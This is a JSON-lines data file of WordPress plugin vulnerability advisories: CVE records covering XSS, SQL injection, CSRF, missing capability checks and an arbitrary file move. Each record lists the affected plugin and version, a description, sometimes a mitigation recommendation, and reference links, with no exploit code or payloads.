{"CVE_ID":"CVE-2023-1263","slug":"cmp-coming-soon-maintenance","versionImpact":"4.1.6","description":"The CMP \u2013 Coming Soon & Maintenance plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 4.1.6 via the cmp_get_post_detail function. This can allow unauthenticated individuals to obtain the contents of any non-password-protected, published post or page even when maintenance mode is enabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e01b4259-ed8d-44a4-9771-470de45b14a8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e01b4259-ed8d-44a4-9771-470de45b14a8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L2759\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L2759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5315","slug":"wp-gmappity-easy-google-maps","versionImpact":"0.6","description":"The Google Maps made Simple plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gmappity-easy-google-maps\\\/tags\\\/0.6\\\/wpgmappity-metadata.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gmappity-easy-google-maps\\\/tags\\\/0.6\\\/wpgmappity-metadata.php#L127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262db9aa-0db5-48cd-a85b-3e6302e88a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262db9aa-0db5-48cd-a85b-3e6302e88a42?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2000","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee517de-a47e-47c9-8322-92ce772191b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee517de-a47e-47c9-8322-92ce772191b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3824","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/749ae334-b1d1-421e-a04c-35464c961a4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/749ae334-b1d1-421e-a04c-35464c961a4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4873","slug":"replace-image","versionImpact":"1.1.10","description":"The Replace Image plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.10 via the image replacement functionality due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to replace images uploaded by higher level users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d3a62-f7e5-4776-bed9-7ff3f81da452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d3a62-f7e5-4776-bed9-7ff3f81da452?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/replace-image\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/replace-image\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-45270","slug":"carousel-slider","description":"WordPress plugin \"Carousel Slider\" provided by Sayful Islam contains a cross-site request forgery vulnerability on Hero image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"name\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8861","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.3.2","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.9.3.2 due to incorrect use of the wp_kses_allowed_html function, which allows the 'onclick' attribute for certain HTML elements without sufficient restriction or context validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3188c2-e5b0-4d83-8c92-ae6b409c92f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3188c2-e5b0-4d83-8c92-ae6b409c92f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/includes\\\/class-profile-magic.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/includes\\\/class-profile-magic.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profilegrid-user-profiles-groups-and-communities\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profilegrid-user-profiles-groups-and-communities\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2065\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2065\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157510\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157510\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11381","slug":"control-horas","versionImpact":"1.0.1","description":"The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-horas\\\/trunk\\\/includes\\\/class-fichaje.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-horas\\\/trunk\\\/includes\\\/class-fichaje.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aeafeec-7202-4ee6-b724-8dcf98591294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aeafeec-7202-4ee6-b724-8dcf98591294?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12774","slug":"altra-side-menu","versionImpact":"2.0","description":"The Altra Side Menu WordPress plugin through 2.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete arbitrary menu via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8decbef5-f106-488b-925c-42b3b280460a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8decbef5-f106-488b-925c-42b3b280460a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0692","slug":"simple-video-management-system","versionImpact":"1.0.4","description":"The Simple Video Management System WordPress plugin through 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/176f329b-a861-4ab0-ad1d-02f750f9b691\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/176f329b-a861-4ab0-ad1d-02f750f9b691\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1346","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the clear_page_cache function. This makes it possible for unauthenticated attackers to clear the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b228f8b1-dd68-41ee-bc49-6a62e5267233\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b228f8b1-dd68-41ee-bc49-6a62e5267233\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25140","slug":"responsive-coming-soon","versionImpact":"1.8.1","description":"The WordPress Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the logo_width, logo_height, rcsp_logo_url, home_sec_link_txt, rcsp_headline and rcsp_description parameters in versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/738c6c77-97ef-4e47-9f14-9b73ea425bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/738c6c77-97ef-4e47-9f14-9b73ea425bc2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\\\/responsive-coming-soon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2121321\\\/responsive-coming-soon\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\\\/responsive-coming-soon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2123149\\\/responsive-coming-soon\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-in-wordpress-coming-soon-page-and-maintenance-mode-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2026","slug":"image-protector","versionImpact":"1.1","description":"The Image Protector WordPress plugin through 1.1 does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b59f640-5568-42bb-87b7-36eb448db5be\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b59f640-5568-42bb-87b7-36eb448db5be\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1053","slug":"event-tickets","versionImpact":"5.8.1","description":"The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, with contributor-level access and above, to email the attendees list to themselves.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038150\\\/event-tickets\\\/tags\\\/5.8.2\\\/src\\\/Tickets\\\/Commerce\\\/Reports\\\/Attendees.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038150\\\/event-tickets\\\/tags\\\/5.8.2\\\/src\\\/Tickets\\\/Commerce\\\/Reports\\\/Attendees.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1997","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3823","slug":"base64-encoderdecoder","versionImpact":"0.9.2","description":"The Base64 Encoder\/Decoder WordPress plugin through 0.9.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a138215c-4b8c-4182-978f-d21ce25070d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a138215c-4b8c-4182-978f-d21ce25070d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4667","slug":"blog-posts-and-category-for-elementor","versionImpact":"1.0.3","description":"The Blog, Posts and Category Filter for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post and Category Filter widget in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied 'post_types' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a24c2d7d-8df8-4a3a-a538-09e11ebc6dd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a24c2d7d-8df8-4a3a-a538-09e11ebc6dd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-posts-and-category-for-elementor\\\/trunk\\\/widgets\\\/post-category-filter.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-posts-and-category-for-elementor\\\/trunk\\\/widgets\\\/post-category-filter.php#L885\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-posts-and-category-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-posts-and-category-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6272","slug":"spider-contacts","versionImpact":"1.1.7","description":"The SpiderContacts WordPress plugin through 1.1.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/146b94df-7fc6-4da3-9ef1-d2875ae3fa9e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/146b94df-7fc6-4da3-9ef1-d2875ae3fa9e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-45269","slug":"carousel-slider","description":"WordPress plugin \"Carousel Slider\" provided by Sayful Islam contains a cross-site request forgery vulnerability on Carousel image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"name\":\"https:\\\/\\\/github.com\\\/sayful1\\\/carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/carousel-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN25264194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6517","slug":"ds-cf7-math-captcha","versionImpact":"2.0.1","description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11355","slug":"ultimate-youtube-video-player","versionImpact":"3.3","description":"The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_setting() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view settings for playlists.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/getsetting.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/getsetting.php#L1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4119178c-9227-4623-a962-e0f103612c75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4119178c-9227-4623-a962-e0f103612c75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12618","slug":"newsletter2go","versionImpact":"4.0.14","description":"The Newsletter2Go plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'resetStyles' AJAX action in all versions up to, and including, 4.0.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset styles.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/trunk\\\/gui\\\/N2Go_Gui.php#L294\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/trunk\\\/gui\\\/N2Go_Gui.php#L294\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09b2d763-63ce-4cc7-aa04-589bb8697ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09b2d763-63ce-4cc7-aa04-589bb8697ce9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12773","slug":"altra-side-menu","versionImpact":"2.0","description":"The Altra Side Menu WordPress plugin through 2.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab64105-599f-49a4-b01d-c873ff34b590\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab64105-599f-49a4-b01d-c873ff34b590\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2941","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.4","description":"The Drag and Drop Multiple File Upload for WooCommerce plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the wc-upload-file[] parameter in all versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&new=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&new=3266697%40drag-and-drop-multiple-file-upload-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2685a2b4-aba3-425b-af0d-06f7693ab3d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2685a2b4-aba3-425b-af0d-06f7693ab3d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3924","slug":"peprodev-ups","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to unauthorized access of data via its publicly exposed reset-password endpoint. The plugin looks up the 'valid_email' value based solely on a supplied username parameter, without verifying that the requester is associated with that user account. This allows unauthenticated attackers to enumerate email addresses for any user, including administrators.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bb36c0f-68b3-492e-9f08-fe6228b0363f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bb36c0f-68b3-492e-9f08-fe6228b0363f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
